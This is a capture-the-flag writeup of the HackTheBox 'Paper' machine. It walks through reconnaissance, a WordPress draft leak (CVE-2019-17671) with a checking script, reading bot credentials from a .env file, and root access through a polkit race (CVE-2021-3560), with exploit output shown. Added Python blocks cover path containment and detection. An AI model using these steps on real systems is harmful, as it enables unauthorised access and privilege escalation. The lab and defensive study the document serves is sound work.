HackTheBox Paper Writeup

February 08, 2022, 1 min read


This box was simple but fun to poke around in. There were hints at every step along the way, though it took time, and some trial and error, to notice them.

Let's get started!




└──╼ #nmap -sC -sV -sS -A -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-11 22:28 EST
Nmap scan report for
Host is up (0.028s latency).
Not shown: 65532 closed tcp ports (reset)
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops

TRACEROUTE (using port 995/tcp)
1   27.30 ms
2   27.30 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.24 seconds


└──╼ #gobuster fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -b "404"
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Excluded Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/02/11 22:33:42 Starting gobuster in fuzzing mode
Found: [Status=301] [Length=235]
Progress: 66278 / 220561 (30.05%)                         ^C
[!] Keyboard interrupt detected, terminating.
2022/02/11 22:36:44 Finished

I didn't let gobuster run to completion; it had stopped finding anything, so I cut it short rather than wait. Letting it finish is the safer practice, since a hit deep in the wordlist is easy to miss this way.


└──╼ $nikto -host
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2022-02-11 23:03:11 (GMT-5)
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-backend-server' found, with contents: office.paper
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

Uncommon header 'x-backend-server' found, with contents: office.paper

This is our vector. The x-backend-server header names a virtual host, office.paper, that Apache only serves when the request's Host header matches. To reach it we add office.paper to our own /etc/hosts file, mapped to the target's IP.

# Host addresses
127.0.0.1    localhost  zyphen
::1          localhost ip6-localhost ip6-loopback
ff02::1      ip6-allnodes
ff02::2      ip6-allrouters
<target-ip>  office.paper


After looking through the new site, a WordPress blog, we notice an odd comment on one of the posts.

In the Feeling Alone! post, Nick tells Michael not to leave anything in the drafts.

This suggests there is a way to view drafts in this WordPress install without logging in.


By appending ?static=1 to the base URL, WordPress renders the draft and private posts to an unauthenticated visitor. This is CVE-2019-17671, a mishandling of the static query variable that affects WordPress versions before 5.2.4.
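This check can be scripted rather than done by clicking around. The following is an added example, not code from the original writeup: it requests the site twice with the Host header set to the vhost name (so no /etc/hosts edit is needed), once plainly and once with ?static=1, and reports the post titles that appear only in the second response, along with whether the generator meta tag puts the version below 5.2.4. The target address, the office.paper vhost and the "entry-title" class on post titles are assumptions about the site; the canned pages used offline are constructed.

```python
"""Check a WordPress site for the ?static=1 draft leak (CVE-2019-17671).

Added example, not part of the original writeup. Assumes the theme wraps
post titles in the standard WordPress "entry-title" class and that the
target is reached by IP with the vhost name supplied in the Host header.
"""
import re
import urllib.request

# Core WordPress template tags wrap each post title in <h1|h2 class="entry-title">;
# inner tags (the permalink <a>) are stripped to get plain text.
ENTRY_TITLE = re.compile(
    r'<h[1-6][^>]*class="[^"]*\bentry-title\b[^"]*"[^>]*>(.*?)</h[1-6]>', re.S
)
GENERATOR = re.compile(r'<meta name="generator" content="WordPress ([\d.]+)"')
TAG = re.compile(r"<[^>]+>")


def http_get(url, host):
    """Fetch url (which points at the IP) while presenting the vhost name in the
    Host header, so the backend named by x-backend-server answers without any
    /etc/hosts change."""
    req = urllib.request.Request(url, headers={"Host": host, "User-Agent": "draft-check/0.1"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def canned_fetch(normal_html, static_html):
    """Offline stand-in for http_get: hands back constructed pages by URL."""
    def fetch(url, host):
        return static_html if url.endswith("?static=1") else normal_html
    return fetch


def titles(html):
    """Set of plain-text post titles rendered in the page."""
    return {TAG.sub("", m).strip() for m in ENTRY_TITLE.findall(html)}


def wp_version(html):
    """Version from the generator meta tag, or None if the theme removed it."""
    m = GENERATOR.search(html)
    return m.group(1) if m else None


def version_affected(version):
    """CVE-2019-17671 was fixed in 5.2.4; older versions are exposed.
    Returns None when the version is unknown."""
    if version is None:
        return None
    parts = tuple(int(p) for p in version.split("."))
    return parts < (5, 2, 4)


def leaked_drafts(base, host, fetch=http_get):
    """Titles that show up only with ?static=1 appended, i.e. drafts or private
    posts served to an unauthenticated visitor."""
    normal = fetch(base + "/", host)
    static = fetch(base + "/?static=1", host)
    version = wp_version(normal)
    return {
        "version": version,
        "affected": version_affected(version),
        "leaked": sorted(titles(static) - titles(normal)),
    }


if __name__ == "__main__":
    import sys
    # usage: python3 draft_check.py http://<target-ip> office.paper
    print(leaked_drafts(sys.argv[1], sys.argv[2]))
```

The comparison against the plain page matters: drafts are what appears only with the query variable set, so diffing the two responses avoids counting published posts as findings.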


One of the drafts contains a link to a chat room, which I have blurred out.


We can now create an account on the chat page and start more reconnaissance.


In the general chat, after scrolling up a bit, there is a post made by a bot that lists its commands. Knowing those commands, we can DM the bot our own.

Something I noticed in particular was the .env in hubot's folder. It contained a username and password for the bot, and a service password like that may well be Dwight's own password too, since reuse between service accounts and user accounts is common.
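The reason those credentials were reachable at all is that a chat bot served files from disk on request and nothing stopped it from handing over a dotfile outside its intended directory. As an added example (not the bot's code; the file command, the sales directory and the .env contents are assumptions), here is the containment check such a command needs: resolve the requested path, refuse anything that escapes the base directory, and refuse dotfiles even inside it.

```python
"""Path containment for a bot-style "read me this file" command.

Added example, not taken from the writeup or from the bot on the box. The
directory layout built by demo() (a sales/ tree beside a hubot/.env) and the
.env contents are constructed.
"""
import os
import tempfile

# Names a file-serving command must never hand out even inside the allowed
# tree: dotfiles carry credentials (.env), keys and shell history.
DENY_BASENAMES = {".env", ".bash_history", ".ssh", "id_rsa"}


def safe_read(base_dir, requested):
    """Return file contents if `requested` resolves inside base_dir and is not
    a credential-bearing dotfile; raise PermissionError otherwise."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # realpath collapses ../ and follows symlinks, so commonpath on the resolved
    # paths catches traversal and symlink escapes alike. An absolute `requested`
    # replaces base in os.path.join and is caught the same way.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{requested!r} escapes {base_dir}")
    rel = os.path.relpath(target, base)
    if any(part.startswith(".") or part in DENY_BASENAMES for part in rel.split(os.sep)):
        raise PermissionError(f"{requested!r} is a dotfile or denied name")
    with open(target, "rb") as fh:
        return fh.read()


def demo():
    """Build a throwaway tree (constructed data) and show what the check
    allows and refuses, as a mapping of request -> contents or 'denied'."""
    root = tempfile.mkdtemp()
    sales = os.path.join(root, "sales")
    hubot = os.path.join(root, "hubot")
    os.makedirs(sales)
    os.makedirs(hubot)
    with open(os.path.join(sales, "q1.txt"), "w") as f:
        f.write("paper: 42 reams\n")
    with open(os.path.join(hubot, ".env"), "w") as f:
        f.write("ROCKETCHAT_PASSWORD=example-only\n")  # constructed secret
    results = {}
    for req in ("q1.txt", "../hubot/.env", "../../etc/passwd", "/etc/passwd"):
        try:
            results[req] = safe_read(sales, req).decode()
        except PermissionError:
            results[req] = "denied"
    return results


if __name__ == "__main__":
    for req, outcome in demo().items():
        print(f"{req:20} -> {outcome.strip()}")
```

Checking the resolved path rather than the string the user typed is the point: a denylist of "../" is bypassed by symlinks and by encodings, while commonpath on realpath output is not.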



We can SSH in as dwight using that password, and that gives us the user flag.

└──╼ #ssh dwight@<target>
The authenticity of host '<target> (<target>)' can't be established.
ECDSA key fingerprint is SHA256:2eiFA8VFQOZukubwDkd24z/kfLkdKlz4wkAa/lRN3Lg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '<target>' (ECDSA) to the list of known hosts.
dwight@<target>'s password: 
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Fri Feb 11 23:26:34 2022 from
[dwight@<target> ~]$ ls
bot_restart.sh  hubot  sales  user.txt
[dwight@<target> ~]$ cat user.txt 

Privilege Escalation


LinPEAS is a script that enumerates a Linux host for privilege-escalation paths. It runs with an ordinary user's permissions and gives a detailed report on each topic.

Generally for privesc, we first look at what sudo allows.

In the LinPEAS output the host is flagged as vulnerable to CVE-2021-3560. Note that this is a polkit bug, not a sudo one: a race in polkit's authorization check lets a local user create an administrator account through D-Bus. The exploit output below confirms that is the target.


Running Ahmad Almorabea's exploit for it (exp.py, based on Kevin Backhouse's original) with python3 gets us root. The bug is a race, so the script keeps checking until the new user exists; the repeated "no such user" lines below are that polling, not an error.

[dwight@<target> ~]$ python3 exp.py 
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
[+] Starting the Exploit 
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
[+] User Created with the name of ahmed
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

bash: cannot set terminal process group (11001): Inappropriate ioctl for device
bash: no job control in this shell
[root@<target> dwight]# su ahmed
bash: cannot set terminal process group (11001): Inappropriate ioctl for device
bash: no job control in this shell
[ahmed@<target> dwight]$ sudo su
bash: cannot set terminal process group (11001): Inappropriate ioctl for device
bash: no job control in this shell
[root@<target> dwight]# ls
bot_restart.sh  exp.py  hubot  linpeas.sh  sales  user.txt
[root@<target> dwight]# cd /root/
[root@<target> ~]# ls
anaconda-ks.cfg  initial-setup-ks.cfg  root.txt
[root@<target> ~]# cat root.txt 
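Two things worth having around this step, as an added example that is not from the writeup or from the exploit it ran. First, a version triage that says whether the installed polkit is in the upstream range CVE-2021-3560 affects (0.113 through 0.118; distributions backport the fix without changing the version string, so a hit means "go verify", not "proven"). Second, for the defender, the artifact this exploit leaves behind: a new local account that was not in the previous snapshot and now sits in wheel or sudo, which is exactly what "su ahmed" followed by "sudo su" relies on. The package strings and the passwd/group snapshots it is checked against are constructed.

```python
"""Triage and detection around CVE-2021-3560 (polkit).

Added example, not part of the original writeup or of exp.py. Version parsing
covers `pkaction --version`, rpm and dpkg package strings; sample snapshots
used with it are constructed.
"""
import re

# Upstream polkit 0.113 introduced the bug and 0.119 fixed it. Distros backport
# fixes without bumping the version, so treat a hit as a prompt to verify.
VULN_RANGE = ((0, 113), (0, 118))


def polkit_version(text):
    """Pull (major, minor) out of `pkaction --version`, an rpm name such as
    polkit-0.115-11.el8.x86_64, or a dpkg -l line for policykit-1."""
    m = re.search(r"(?:pkaction version |polkit-|policykit-1\s+)(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def polkit_in_affected_range(text):
    """True/False for a recognised version, None if no version was found."""
    v = polkit_version(text)
    return None if v is None else VULN_RANGE[0] <= v <= VULN_RANGE[1]


def parse_passwd(text):
    """name -> uid for each /etc/passwd line."""
    users = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 3:
            users[f[0]] = int(f[2])
    return users


def sudo_members(group_text, admin_groups=("wheel", "sudo")):
    """Members listed on the wheel/sudo lines of /etc/group."""
    members = set()
    for line in group_text.splitlines():
        f = line.split(":")
        if len(f) == 4 and f[0] in admin_groups and f[3]:
            members.update(f[3].split(","))
    return members


def new_sudo_users(passwd_before, passwd_after, group_after):
    """Accounts absent from the earlier snapshot that can now sudo. The exploit
    asks the Accounts service for an administrator-type user, which on CentOS
    means wheel membership, so this is the cheap post-hoc check."""
    before, after = parse_passwd(passwd_before), parse_passwd(passwd_after)
    added = set(after) - set(before)
    return sorted(added & sudo_members(group_after))


if __name__ == "__main__":
    import subprocess
    try:
        out = subprocess.run(["pkaction", "--version"], capture_output=True, text=True).stdout
    except FileNotFoundError:
        out = ""
    print("polkit in affected range:", polkit_in_affected_range(out))
```

The snapshot diff is deliberately dumb: it needs an earlier copy of /etc/passwd, which is exactly what a file-integrity baseline or a config backup gives you, and it does not depend on logging that the race may or may not have produced.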

We are done!

Published February 08, 2022, by ZyphenSVC.



Copyright © 2023 Sriaditya Vedantam. Site source on GitHub.